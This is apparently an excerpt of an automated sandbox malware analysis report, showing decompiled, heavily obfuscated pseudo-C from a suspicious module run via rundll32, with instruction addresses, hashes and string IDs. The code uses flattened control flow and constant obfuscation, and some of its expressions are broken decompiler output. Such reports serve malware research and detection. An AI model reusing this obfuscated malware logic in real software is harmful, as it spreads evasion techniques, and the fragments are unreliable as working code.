                                                                                                                                  				_v120 = 0x563e36;
                                                                                                                                  				_v120 = _v120 >> 0xe;
                                                                                                                                  				_v120 = _v120 << 5;
                                                                                                                                  				_v120 = _v120 ^ 0x00027d23;
                                                                                                                                  				_v176 = 0x87c40f;
                                                                                                                                  				_v176 = _v176 ^ 0xb401f56c;
                                                                                                                                  				_v176 = _v176 + 0xffff7429;
                                                                                                                                  				_v176 = _v176 | 0xf3ec0d69;
                                                                                                                                  				_v176 = _v176 ^ 0xf7eb47c6;
                                                                                                                                  				_v184 = 0x47488d;
                                                                                                                                  				_v184 = _v184 >> 0xf;
                                                                                                                                  				_v184 = _v184 << 0xf;
                                                                                                                                  				_v184 = _v184 << 1;
                                                                                                                                  				_v184 = _v184 ^ 0x0086c0ad;
                                                                                                                                  				_v136 = 0xb24629;
                                                                                                                                  				_v136 = _v136 | 0x7ef33f67;
                                                                                                                                  				_v136 = _v136 ^ 0x7ef17c1c;
                                                                                                                                  				_v144 = 0xba01aa;
                                                                                                                                  				_v144 = _v144 | 0x3cf3a1ff;
                                                                                                                                  				_v144 = _v144 ^ 0x3cf83085;
                                                                                                                                  				_v124 = 0xbe6d5e;
                                                                                                                                  				_v124 = _v124 + 0xffff96e9;
                                                                                                                                  				_v124 = _v124 | 0xcf3d3218;
                                                                                                                                  				_v124 = _v124 ^ 0xcfb1306a;
                                                                                                                                  				_v36 = 0xa69a94;
                                                                                                                                  				_v36 = _v36 + 0xffffed5e;
                                                                                                                                  				_v36 = _v36 ^ 0x00a0b8ce;
                                                                                                                                  				_v104 = 0xa8033b;
                                                                                                                                  				_t433 = 9;
                                                                                                                                  				_v104 = _v104 / _t433;
                                                                                                                                  				_v104 = _v104 >> 6;
                                                                                                                                  				_v104 = _v104 ^ 0x0005e2c3;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t434 = _v160;
                                                                                                                                  					while(1) {
                                                                                                                                  						_t400 = _v152;
                                                                                                                                  						while(1) {
                                                                                                                                  							L3:
                                                                                                                                  							_t493 = _t485 - 0xa1723c1;
                                                                                                                                  							if(_t493 > 0) {
                                                                                                                                  								goto L19;
                                                                                                                                  							}
                                                                                                                                  							L4:
                                                                                                                                  							if(_t493 == 0) {
                                                                                                                                  								E002E8519(_v144, _v124, _t489);
                                                                                                                                  								_t485 = 0x4b7559b;
                                                                                                                                  								goto L17;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t485 == 0x4b7559b) {
                                                                                                                                  									return E002E8519(_v36, _v104, _t421);
                                                                                                                                  								}
                                                                                                                                  								if(_t485 == 0x4ed616e) {
                                                                                                                                  									_t441 = _v172;
                                                                                                                                  									_t407 = E002E16AF(_v172,  &_v12, _v116, _v132, _t434, _a8, _t421, _v84, _t434,  &_v4, _t434, _v164, _v108, _v92, _v96, _t434, _t434, _v24, _t434, _v56);
                                                                                                                                  									_t491 =  &(_t491[0x12]);
                                                                                                                                  									if(_t407 == 0) {
                                                                                                                                  										L16:
                                                                                                                                  										_t485 = 0xa1723c1;
                                                                                                                                  										L17:
                                                                                                                                  										_t400 = _v152;
                                                                                                                                  									} else {
                                                                                                                                  										_t410 = E002ED25E(_t441);
                                                                                                                                  										_t485 = 0x9a40434;
                                                                                                                                  										_t400 = _v12 * 0x2c + _t421;
                                                                                                                                  										_v152 = _t400;
                                                                                                                                  										_t482 =  >=  ? _t421 : (_t410 & 0x0000001f) * 0x2c + _t421;
                                                                                                                                  									}
                                                                                                                                  									_t434 = _v160;
                                                                                                                                  									_t473 = 0x6a50b97;
                                                                                                                                  									continue;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t485 == _t473) {
                                                                                                                                  										E002E2007(_v72, _v40, _v140, _t434, _v80,  &_v8, _v156, _t434, _t489, _v20);
                                                                                                                                  										_t485 =  !=  ? 0xd1a593f : 0xb29ddc7;
                                                                                                                                  										_t400 = E002E8F9E(_v32, _v180, _v64, _v28, _v160);
                                                                                                                                  										_t491 =  &(_t491[0xb]);
                                                                                                                                  										L30:
                                                                                                                                  										_t473 = 0x6a50b97;
                                                                                                                                  										goto L31;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t485 == 0x8939926) {
                                                                                                                                  											_t485 = 0xe60f9b1;
                                                                                                                                  											continue;
                                                                                                                                  										} else {
                                                                                                                                  											if(_t485 != 0x9a40434) {
                                                                                                                                  												L31:
                                                                                                                                  												if(_t485 != 0x88fb243) {
                                                                                                                                  													goto L1;
                                                                                                                                  												}
                                                                                                                                  											} else {
                                                                                                                                  												_t434 = E002D42C4(_v88, _a8, _v48, _v188,  *_t482, _v100, _v148);
                                                                                                                                  												_t491 =  &(_t491[5]);
                                                                                                                                  												_v160 = _t434;
                                                                                                                                  												_t473 = 0x6a50b97;
                                                                                                                                  												_t485 =  !=  ? 0x6a50b97 : 0xb29ddc7;
                                                                                                                                  												_t400 = _v152;
                                                                                                                                  												while(1) {
                                                                                                                                  													L3:
                                                                                                                                  													_t493 = _t485 - 0xa1723c1;
                                                                                                                                  													if(_t493 > 0) {
                                                                                                                                  														goto L19;
                                                                                                                                  													}
                                                                                                                                  													goto L4;
                                                                                                                                  												}
                                                                                                                                  												goto L19;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L34:
                                                                                                                                  							return _t400;
                                                                                                                                  							L19:
                                                                                                                                  							if(_t485 == 0xaf524c8) {
                                                                                                                                  								_push(_t434);
                                                                                                                                  								_push(_t434);
                                                                                                                                  								_t400 = E002D7FF2(0x2000);
                                                                                                                                  								_t489 = _t400;
                                                                                                                                  								if(_t400 == 0) {
                                                                                                                                  									_t485 = 0x4b7559b;
                                                                                                                                  									goto L30;
                                                                                                                                  								} else {
                                                                                                                                  									_t485 = 0x4ed616e;
                                                                                                                                  									goto L17;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t485 == 0xb29ddc7) {
                                                                                                                                  									_t482 = _t482 + 0x2c;
                                                                                                                                  									asm("sbb esi, esi");
                                                                                                                                  									_t485 = (_t485 & 0xff8ce073) + 0xa1723c1;
                                                                                                                                  									continue;
                                                                                                                                  								} else {
                                                                                                                                  									_t400 = 0xd1a593f;
                                                                                                                                  									if(_t485 == 0xd1a593f) {
                                                                                                                                  										E002DDF6F(_v120, _v176, _v128, _v16, _v184, _v136, _t489);
                                                                                                                                  										_t491 =  &(_t491[5]);
                                                                                                                                  										goto L16;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t485 != 0xe60f9b1) {
                                                                                                                                  											goto L31;
                                                                                                                                  										} else {
                                                                                                                                  											_push(_t434);
                                                                                                                                  											_push(_t434);
                                                                                                                                  											_t400 = E002D7FF2(0x20000);
                                                                                                                                  											_t421 = 0xd1a593f;
                                                                                                                                  											if(0xd1a593f != 0) {
                                                                                                                                  												_t485 = 0xaf524c8;
                                                                                                                                  												goto L17;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L34;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}









































































                                                                                                                                  0x002ddb16
                                                                                                                                  0x002ddb21
                                                                                                                                  0x002ddb2c
                                                                                                                                  0x002ddb34
                                                                                                                                  0x002ddb3f
                                                                                                                                  0x002ddb47
                                                                                                                                  0x002ddb52
                                                                                                                                  0x002ddb57
                                                                                                                                  0x002ddb5b
                                                                                                                                  0x002ddb63
                                                                                                                                  0x002ddb6b
                                                                                                                                  0x002ddb76
                                                                                                                                  0x002ddb81
                                                                                                                                  0x002ddb8c
                                                                                                                                  0x002ddb97
                                                                                                                                  0x002ddb9f
                                                                                                                                  0x002ddbaa
                                                                                                                                  0x002ddbb2
                                                                                                                                  0x002ddbb7
                                                                                                                                  0x002ddbbc
                                                                                                                                  0x002ddbc4
                                                                                                                                  0x002ddbcc
                                                                                                                                  0x002ddbd4
                                                                                                                                  0x002ddbdc
                                                                                                                                  0x002ddbe4
                                                                                                                                  0x002ddbec
                                                                                                                                  0x002ddbf4
                                                                                                                                  0x002ddbf9
                                                                                                                                  0x002ddbfe
                                                                                                                                  0x002ddc02
                                                                                                                                  0x002ddc0a
                                                                                                                                  0x002ddc12
                                                                                                                                  0x002ddc1a
                                                                                                                                  0x002ddc22
                                                                                                                                  0x002ddc2a
                                                                                                                                  0x002ddc32
                                                                                                                                  0x002ddc3a
                                                                                                                                  0x002ddc42
                                                                                                                                  0x002ddc4a
                                                                                                                                  0x002ddc52
                                                                                                                                  0x002ddc5a
                                                                                                                                  0x002ddc65
                                                                                                                                  0x002ddc70
                                                                                                                                  0x002ddc7b
                                                                                                                                  0x002ddc89
                                                                                                                                  0x002ddc91
                                                                                                                                  0x002ddc95
                                                                                                                                  0x002ddc9a
                                                                                                                                  0x002ddca2
                                                                                                                                  0x002ddca2
                                                                                                                                  0x002ddca2
                                                                                                                                  0x002ddca6
                                                                                                                                  0x002ddca6
                                                                                                                                  0x002ddcaa
                                                                                                                                  0x002ddcaa
                                                                                                                                  0x002ddcaa
                                                                                                                                  0x002ddcb0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddcb6
                                                                                                                                  0x002ddcb6
                                                                                                                                  0x002dde66
                                                                                                                                  0x002dde6c
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddcbc
                                                                                                                                  0x002ddcc2
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddf63
                                                                                                                                  0x002ddcce
                                                                                                                                  0x002dde01
                                                                                                                                  0x002dde05
                                                                                                                                  0x002dde0a
                                                                                                                                  0x002dde0f
                                                                                                                                  0x002dde52
                                                                                                                                  0x002dde52
                                                                                                                                  0x002dde57
                                                                                                                                  0x002dde57
                                                                                                                                  0x002dde11
                                                                                                                                  0x002dde1f
                                                                                                                                  0x002dde27
                                                                                                                                  0x002dde39
                                                                                                                                  0x002dde3d
                                                                                                                                  0x002dde41
                                                                                                                                  0x002dde41
                                                                                                                                  0x002dde44
                                                                                                                                  0x002dde48
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddcd4
                                                                                                                                  0x002ddcd6
                                                                                                                                  0x002ddd6a
                                                                                                                                  0x002ddd91
                                                                                                                                  0x002ddd9b
                                                                                                                                  0x002ddda0
                                                                                                                                  0x002ddf40
                                                                                                                                  0x002ddf40
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddcd8
                                                                                                                                  0x002ddcde
                                                                                                                                  0x002ddd31
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddce0
                                                                                                                                  0x002ddce6
                                                                                                                                  0x002ddf45
                                                                                                                                  0x002ddf4b
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddf4d
                                                                                                                                  0x002ddcec
                                                                                                                                  0x002ddd14
                                                                                                                                  0x002ddd16
                                                                                                                                  0x002ddd1b
                                                                                                                                  0x002ddd24
                                                                                                                                  0x002ddd29
                                                                                                                                  0x002ddca6
                                                                                                                                  0x002ddcaa
                                                                                                                                  0x002ddcaa
                                                                                                                                  0x002ddcaa
                                                                                                                                  0x002ddcb0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddcb0
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddcaa
                                                                                                                                  0x002ddce6
                                                                                                                                  0x002ddcde
                                                                                                                                  0x002ddcd6
                                                                                                                                  0x002ddcce
                                                                                                                                  0x002ddf6e
                                                                                                                                  0x002ddf6e
                                                                                                                                  0x002dde73
                                                                                                                                  0x002dde79
                                                                                                                                  0x002ddf22
                                                                                                                                  0x002ddf23
                                                                                                                                  0x002ddf24
                                                                                                                                  0x002ddf29
                                                                                                                                  0x002ddf2f
                                                                                                                                  0x002ddf3b
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddf31
                                                                                                                                  0x002ddf31
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddf31
                                                                                                                                  0x002dde7f
                                                                                                                                  0x002dde85
                                                                                                                                  0x002ddef6
                                                                                                                                  0x002ddefb
                                                                                                                                  0x002ddf03
                                                                                                                                  0x00000000
                                                                                                                                  0x002dde87
                                                                                                                                  0x002dde87
                                                                                                                                  0x002dde8e
                                                                                                                                  0x002ddee9
                                                                                                                                  0x002ddeee
                                                                                                                                  0x00000000
                                                                                                                                  0x002dde90
                                                                                                                                  0x002dde96
                                                                                                                                  0x00000000
                                                                                                                                  0x002dde9c
                                                                                                                                  0x002ddeb3
                                                                                                                                  0x002ddeb4
                                                                                                                                  0x002ddeb5
                                                                                                                                  0x002ddeba
                                                                                                                                  0x002ddec0
                                                                                                                                  0x002ddec6
                                                                                                                                  0x00000000
                                                                                                                                  0x002ddec6
                                                                                                                                  0x002ddec0
                                                                                                                                  0x002dde96
                                                                                                                                  0x002dde8e
                                                                                                                                  0x002dde85
                                                                                                                                  0x00000000
                                                                                                                                  0x002dde79
                                                                                                                                  0x002ddcaa
                                                                                                                                  0x002ddca6

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6#d$6>V$7R$C%$Ed;$nq$udo
                                                                                                                                  • API String ID: 0-652707834
                                                                                                                                  • Opcode ID: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                                  • Instruction ID: d09931dce7410df63200f6c02e99bcdb2f43a550c1f62826cc53534178fdf330
                                                                                                                                  • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                                  • Instruction Fuzzy Hash: 0212307251C7809FD368DF25C88AA9FBBE2BBC4344F108A1DE5C986260D7B18958CF53
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 98%
E002D81B7() {
    void* _t347;
    signed int _t350;
    signed int _t351;
    signed int _t353;
    signed int _t355;
    signed int _t360;
    signed int _t364;
    void* _t374;
    intOrPtr _t407;
    signed int _t411;
    signed int _t414;
    signed int _t415;
    signed int _t416;
    signed int _t417;
    signed int _t418;
    signed int _t419;
    signed int _t420;
    signed int* _t422;
    void* _t426;

     *(_t426 + 0x74) = 0xd212a7;
     *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
    _t374 = 0xebf23c2;
     *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
     *(_t426 + 0x20) = 0x60274e;
     *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
    _t414 = 0x29;
     *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
     *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
     *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
     *(_t426 + 0x9c) = 0x5f71eb;
     *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
     *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
     *(_t426 + 0x1c) = 0x8735e4;
     *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
     *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
     *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
     *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
     *(_t426 + 0x58) = 0x9ed5c5;
    _t415 = 0x17;
     *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
     *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
     *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
     *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
     *(_t426 + 0x5c) = 0x8fe0dc;
     *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
     *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
     *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
     *(_t426 + 0x48) = 0x18253c;
     *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
     *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
     *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
     *(_t426 + 0x94) = 0x40d4a3;
     *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
     *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
     *(_t426 + 0x20) = 0x8fc5ff;
     *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
     *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
     *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
     *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
     *(_t426 + 0x38) = 0x52431;
     *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
     *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
     *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
     *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
     *(_t426 + 0x44) = 0xc4652;
     *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
     *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
     *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
     *(_t426 + 0x10) = 0x2c06e;
     *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
     *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
     *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
     *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
     *(_t426 + 0x7c) = 0xc3ec9d;
     *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
     *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
     *(_t426 + 0x70) = 0x3416d6;
     *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
     *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
     *(_t426 + 0x64) = 0x1e8df6;
     *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
     *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
     *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
     *(_t426 + 0x28) = 0xebc79e;
     *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
     *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
     *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
     *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
     *(_t426 + 0x4c) = 0x6795aa;
     *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
     *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
     *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
     *(_t426 + 0x50) = 0xbc4be8;
     *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
    _t416 = 0x6f;
     *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
     *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
     *(_t426 + 0x94) = 0xde468f;
     *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
     *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
     *(_t426 + 0x18) = 0x6e4fa6;
     *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
     *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
     *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
     *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
     *(_t426 + 0x5c) = 0xc77145;
     *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
     *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
     *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
     *(_t426 + 0x44) = 0x492c53;
     *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
     *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
     *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
     *(_t426 + 0xa0) = 0x27589;
    _t417 = 0x3e;
     *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
     *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
     *(_t426 + 0x30) = 0xb4bbc8;
     *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
     *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
     *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
     *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
     *(_t426 + 0x28) = 0xdf5b34;
     *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
    _t418 = 0x5e;
     *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
     *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
     *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
     *(_t426 + 0x90) = 0xff684d;
     *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
     *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
     *(_t426 + 0x20) = 0x90e304;
    _t419 = 0x7f;
     *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
     *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
     *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
     *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
     *(_t426 + 0x60) = 0xa4eb1a;
     *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
     *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
     *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
     *(_t426 + 0x34) = 0xdaab0d;
     *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
     *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
     *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
     *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
     *(_t426 + 0x68) = 0xbbaf5f;
     *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
    _t372 =  *(_t426 + 0x6c);
    _t411 =  *(_t426 + 0x6c);
    _t424 =  *(_t426 + 0x6c);
    _t420 =  *(_t426 + 0x6c);
     *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
     *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
     *(_t426 + 0x74) = 0xfd4b1c;
     *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
     *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
     *(_t426 + 0x88) = 0xbb9d8e;
     *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
     *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
     *(_t426 + 0x3c) = 0x9303e6;
     *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
     *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
     *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
     *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
     *(_t426 + 0x80) = 0xaf4918;
     *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
     *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
     *(_t426 + 0x78) = 0xd8d1b1;
     *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
     *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
    while(1) {
        L1:
        _t347 = 0xfb52c5;
        L2:
        while(_t374 != 0xd963e9) {
            if(_t374 == _t347) {
                _t350 = E002EC264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
                _t426 = _t426 + 0x2c;
                __eflags = _t350;
                if(_t350 == 0) {
                    _t351 =  *(_t426 + 0xa0);
                } else {
                    _t422 = _t411;
                    while(1) {
                        __eflags = _t422[1] - 4;
                        if(_t422[1] != 4) {
                            goto L20;
                        }
                        L19:
                        _t355 = E002DB23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
                        _t426 = _t426 + 0x10;
                        __eflags = _t355;
                        if(_t355 == 0) {
                            _t351 = 1;
                             *(_t426 + 0xa0) = 1;
                        } else {
                            goto L20;
                        }
                        L25:
                        _t420 =  *(_t426 + 0x6c);
                        goto L26;
                        L20:
                        _t353 =  *_t422;
                        __eflags = _t353;
                        if(_t353 == 0) {
                            _t351 =  *(_t426 + 0xa0);
                        } else {
                            _t422 = _t422 + _t353;
                            __eflags = _t422[1] - 4;
                                                                                                                                  										if(_t422[1] != 4) {
                                                                                                                                  											goto L20;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  									goto L25;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L26:
                                                                                                                                  							__eflags = _t351;
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								_t347 = 0xfb52c5;
                                                                                                                                  								_t374 = 0xfb52c5;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								_t407 =  *0x2f3e0c; // 0x0
                                                                                                                                  								E002E458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
                                                                                                                                  								_t374 = 0xd963e9;
                                                                                                                                  								goto L1;
                                                                                                                                  							}
                                                                                                                                  							L32:
                                                                                                                                  						} else {
                                                                                                                                  							if(_t374 == 0x247652d) {
                                                                                                                                  								_t360 = E002D8F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
                                                                                                                                  								_t372 = _t360;
                                                                                                                                  								_t426 = _t426 + 0x28;
                                                                                                                                  								__eflags = _t360 - 0xffffffff;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									_t374 = 0x7db0050;
                                                                                                                                  									while(1) {
                                                                                                                                  										L1:
                                                                                                                                  										_t347 = 0xfb52c5;
                                                                                                                                  										goto L2;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t374 == 0x4334ccc) {
                                                                                                                                  									E002EDA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
                                                                                                                                  									_t364 = E002DB6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
                                                                                                                                  									_t424 = _t364;
                                                                                                                                  									_t426 = _t426 + 0x18;
                                                                                                                                  									_t374 = 0x247652d;
                                                                                                                                  									 *((short*)(_t364 - 2)) = 0;
                                                                                                                                  									while(1) {
                                                                                                                                  										L1:
                                                                                                                                  										_t347 = 0xfb52c5;
                                                                                                                                  										goto L2;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									if(_t374 == 0x7db0050) {
                                                                                                                                  										_t420 = 0x1000;
                                                                                                                                  										_push(_t374);
                                                                                                                                  										_push(_t374);
                                                                                                                                  										 *(_t426 + 0x74) = 0x1000;
                                                                                                                                  										_t411 = E002D7FF2(0x1000);
                                                                                                                                  										_t347 = 0xfb52c5;
                                                                                                                                  										__eflags = _t411;
                                                                                                                                  										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
                                                                                                                                  										continue;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t374 == 0xebf23c2) {
                                                                                                                                  											_t374 = 0x4334ccc;
                                                                                                                                  											continue;
                                                                                                                                  										} else {
                                                                                                                                  											if(_t374 != 0xf828486) {
                                                                                                                                  												L30:
                                                                                                                                  												__eflags = _t374 - 0x24bb42a;
                                                                                                                                  												if(__eflags != 0) {
                                                                                                                                  													continue;
                                                                                                                                  												} else {
                                                                                                                                  												}
                                                                                                                                  											} else {
                                                                                                                                  												E002E1E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						return 0;
